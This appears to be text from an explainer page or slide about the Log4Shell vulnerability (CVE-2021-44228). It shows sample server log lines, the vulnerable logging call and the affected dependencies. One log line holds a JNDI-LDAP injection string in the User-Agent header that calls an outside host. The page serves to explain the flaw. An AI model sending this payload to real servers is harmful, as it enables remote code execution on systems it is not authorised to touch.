203.0.113.7 - GET /search?q=laptop 200 "Mozilla/5.0"198.51.100.3 - POST /login 200 "Mozilla/5.0"45.13.x.x - GET / 200 User-Agent: ${jndi:ldap://45.13.x.x/a}203.0.113.9 - GET /health 200 "kube-probe/1.27"
The server did nothing unusual. It just logged the User-Agent.
log.info(userAgent)
log4j-core 2.14.1
spring-boot
elasticsearch
kafka-client
transitive: you never typed this import
10.0CVSS CRITICAL
Remote Code ExecutionCVE-2021-44228 · "Log4Shell" · December 2021
One line in a logging library, and across the internet every team is asking the same question,
"are we even running Log4j?", and most of them can't answer it.